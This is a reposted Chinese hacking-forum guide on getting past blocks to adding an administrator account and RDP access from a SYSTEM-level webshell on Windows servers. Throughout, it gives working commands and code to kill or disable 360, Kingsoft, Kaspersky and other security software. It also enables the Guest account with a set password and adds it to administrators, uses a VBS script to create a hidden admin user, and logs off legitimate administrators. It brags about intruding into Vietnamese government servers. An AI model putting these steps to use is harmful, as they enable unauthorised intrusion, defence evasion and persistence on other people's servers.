Windows服务器SYSTEM权限Webshell无法添加3389账户情况突破总结

转自:http://bbs.blackbap.org/thread-2331-1-1.html

近好多Silic的朋友在Windows下SYSTEM权限的php webshell下添加账户,但是却无法成功。SYSTEM的权限,权限是够了,却无法成功,原因是什么呢?
原因有很多种,于是我总结了一下成因,并在下面文章进行了一一分析,然后附上了一点个人的突破绕过方法。提权不可能百分百成功,我只是总结了一些常见的情况,其他的我会慢慢补充
作者:YoCo
Smart
来自:Silic Group Hacker
Army

http://blackbap.org
Webshell有了SYSTEM权限,却无法成功添加administrators用户,因此导致无法成功连接3389。总结原因有以下几点:
I.杀软篇
1,360杀毒软件
2,麦咖啡杀毒软件
3,卡巴斯基杀毒软件
4,其他杀毒软件或防护软件
II.策略篇
1,3389端口变更
2,莫名其妙无法添加账户
3,管理员限制篇
4,系统已达最大连接数处理

-----------------------I.
杀软篇-----------------------------
1,360杀毒软件
经常会在国内的一些服务器上遇到360杀毒和防护软件,如果使用webshell进行添加administrators账户时,360会阻止并提示管理员,导致添加失败。
那么如何突破360的限制?360不能完美的支持Server系统,也就是说,其实很简单。
阻止Webshell添加账户的主要是360主动防御,而结束了主动防御,360杀毒根本就是摆设。
那天手痒去百度搜了下blackbap.org这个关键字,居然出现在360论坛上,原来是Silic开发的php大马被某个服务器管理员举报到360论坛上去了。
大致就是这个网管把webshell传上去,说360查不出来,希望更新病毒库云云,结果360工程师看了以后说更新360就能杀到了,结果网管说更新了还是杀不到。然后工程师说装什么什么的,网管说装了,还是杀不到,然后工程师就缩头乌龟了。可见360在server上面很垃圾,用小白的话说就是,请把拿着打口水仗的钱多花在研发产品上吧。
好了,扯淡到此为止,突破方法也该千呼万唤始出来了。
先执行tasklist看一下进程列表,然后

  1. taskkill /im 进程名.exe /f

复制代码

把主动防御结束
360相关进程如下:
360tray.exe,360rp.exe,Zhudongfangyu.exe,360rps.exe,这几个灭了,基本上360的阻碍就清除了,该加账户加账户,该pr就pr了。
Windows下Apache+PHP的特殊性,导致很多php站的webshell有SYSTEM的权限,所以结束360简直易如反掌啊。
即使不是SYSTEM,也有办法的,例如ASPX,asp.net有个操纵进程的功能。看代码(直接从webshell上面拔下来的):

  1. protected void kp_Click(object sender, EventArgs e)
  2. {
  3. Process[] kp = Process.GetProcesses ();
  4. foreach ( Process kp1 in kp )
  5. if (kp1.ProcessName == ListBox1.SelectedValue.ToString())
  6. {
  7. try
  8. {
  9. kp1.Kill();
  10. Response.Write("<script>alert('Killed');location.href='?'</" +
    "script>");
  11. ListBox1.Items.Clear();
  12. }
  13. catch (Exception x)
  14. {
  15. Response.Write(x.Message.ToString());
  16. Response.End();
  17. }
  18. }
  19. }

复制代码

asp.net的这一个kill()函数即使是IIS+ASPX的users用户组依然可以轻松杀死360。
有些SYSYTEM权限却干不掉360,例如360tray.exe,360safe.exe,可以先query
user看看管理员状态,因为很可能是管理员登陆以后运行了图形界面没关闭,系统不执行taskkill
所以logoff把管理员踢了,然后360有的进程就自己灭了,这种情况多出现在2008的server系统上

2,麦咖啡杀毒软件
以前就谈过了关于如何绕过麦咖啡杀毒软件获得3389登陆权限的文章。
文章原文在这里:http://bbs.blackbap.org/thread-2085-1-1.html
那么完整一下过程就是,启用Guest账户,修改Guest用户的密码,添加Guest为administrators用户组。
经过测试,麦咖啡的防护进程恐怕是突破的,于是cmd命令如下:

  1. net user guest /active:yes          //将guest用户启用
  2. net user guest silic!&11133        //修改guest密码
  3. net localgroup administrators guest /add   
    //添加guest到管理员用户组中

复制代码

这三条命令第二条或者第三条有时候可能不会显示命令执行成功,但是实际上只要是SYSTEM权限,就应该可以执行成功的,有无回显并不重要。

3,卡巴斯基
卡巴斯基的防护也是让人头疼的。关于突破卡巴斯基的方法,有很多。
调整系统时间,让卡巴的key失效,这就不说了。还有mkdir建立以非法字符“.”命名的文件夹,将pr等提权程序传进去。
SYSTEM突破卡巴的防御直接添加用户,恐怕不太容易,不过可以尝试,用taskkill结束进程的语句后面
& net user
add命令,同时执行结束进程和添加账户。
此方法尚未实践,但是理论上是可以的,因为卡巴不像麦咖啡,它可以直接被结束,但是立即就会重启进程。

4,金山防护软件
首先说KSafeSvc.exe,
当时不知道是什么玩意, 从文件名目测应该是个金山的东西。
这个进程即使是taskkill也是搞不定的...只要有它,net user
/add的时候,就算net.exe改名了,它也会弹出是否阻止的窗口(可能是它弹的,就算不是它弹的,也要干掉他才能添加)
但是有个命令叫ntsd,可以终结掉大部分进程,例如winlogon.exe
svchost.exe这些..
然后就ntsd -c q -p
PID结束了KSafeSvc.exe
然后说一下:金山毒霸+金山卫士+瑞星防火墙的组合
这个组合看似很牛逼,其实很傻逼。今天就遇到个system的php,上面就是金山毒霸+金山卫士+瑞星防火墙的组合
可以将如下代码保存到c:\windows\temp\a.vbs

  1. set wsnetwork=CreateObject("WSCRIPT.NETWORK")
  2. os="WinNT://"&wsnetwork.ComputerName
  3. Set ob=GetObject(os)
  4. Set oe=GetObject(os&"/Administrators,group")
  5. Set od=ob.Create("user","silic")
  6. od.SetPassword "silic"
  7. od.SetInfo
  8. Set of=GetObject(os&"/silic",user)
  9. oe.add os&"/silic"

复制代码

然后用如下命令执行,就能得到账户为silic密码为silic的管理员账户了:

  1. cscript c:\windows\temp\a.vbs

复制代码

5,禁用服务法

  1. sc config 服务名 start= disabled

复制代码

有时候mysql或者mssql等等提权的时候,会发生杀软无法结束,导致提权失败的情况。
我们给杀软服务设置为禁用,重启服务器,杀毒防护服务就不能运行。就无阻畅通了,例如:

  1. sc config MsMpSvc start= disabled

复制代码

5,其他防护软件
见过很多非主流的防护软件,什么护卫盾啊,Safe3防篡改啊,还有各种类似程序,具体名字我忘了。
这些软件的突破方法和主流防护软件突破方法大致相同,结束进程,或者不使用添加账户,直接启用现有的Guest来突破监控,不赘述了
另外补充一种方法,就是将防护软件的服务从自动启动改为不启动,然后重启服务器。这种方法对绝大部分服务器有效。

--------------------------------II,策略篇-----------------------------
1,3389端口变更
进行3389添加账户前首先要知道3389到底开启没有。
目前只遇到过3389端口变更的例子,没见过不开启3389的例子。那为什么有的外网3389连不上呢?
原因很简单,3389端口变更了呗。找出来的方法再简单不过了netstat
-an查看所有开启的端口。
一个一个可疑的端口试未免太差劲了。netstat
-ano查看端口和使用端口的进程pid,然后Tasklist看一下有哪个svchost.exe进程的pid使用了端口
注意,是svchost.exe当中的某个。

2,莫名奇妙无法添加账户
什么是莫名奇妙?有些主机,Webshell是System权限,tasklist也看不到任何防护的进程,管理员也没在线,提权程序也添加不了,怎么搞?
有因必有果,这样的情况添加不了,多数是系统有组策略限制,通常限制的是密码最短长度。而这个组策略又多数是麦咖啡等防护软件设置上的。或者干脆就是装机的系统本身就GHO上了这个设置。
突破方法不用说了,把密码位数设置长一点就ok,原先密码是123456,现在改为1234abcd!@#$就过了
如果还是添加不上,可以尝试用vbs脚本来添加。

3,管理员限制
有些BT管理员很可恶,直接把c:\windows\system32的net.exe给删了或者换了,于是你直接net的时候会提示拒绝访问或者不是系统命令等等类似提示云云。
管理员看似很牛B,其实很傻逼,系统的net.exe没了,你自己传一个自己的net.exe就突破了。
当然,也有64位系统和你的程序不兼容的情况发生,他是64你就传64位的,很好搞。

4,达到最大连接限制
有时候添加了账户,但是连接提示最大连接数限制。管理员不在线,却占着线不让你上去,等管理员自己上线了,再把你删了。这种管理员够缺德的
对于这种上不去的,首先query
user查看在线的账户,然后看他的登陆ID,一般是0,最高不超过8,超过8说明服务器好久没重启了(这个没准的)
然后logoff
ID,就把对应ID的管理员踢掉了。然后就能登录了。
当然你在logoff的时候不要把自己logoff了,也不最好不要白天踢人。管理员在线被人踢掉的话,你懂的。—
—!
2011年和越南黑阔搞攻防切磋的时候,咱们网站的人就在人越南的gov服务器上乱搞,然后。。。咱网站的黑阔挂菊花聊天室,管理员就删啊删的,咱网站的黑阔就logoff了管理员的账户,然后禁用和administrator。。。后来管理员就眼瞅着大家在菊花聊天室聊天,然后跑了半个小时去机房把网线拔了。。。logoff命令真的很阴毒,尤其是对一些服务器不在本地的网站来说。。。

补充
有些SYSYTEM权限却干不掉360,例如360tray.exe,360safe.exe,可以先query
user看看管理员状态
很可能是管理员登陆以后运行了图形界面没关闭,系统不执行taskkill
所以logoff把管理员踢了,然后360有的进程就自己灭了
多出现在2008的server系统上

上一篇:在SYSTEM权限下以当前用户权限运行程序


下一篇:Windows服务 System.ServiceProcess.ServiceBase类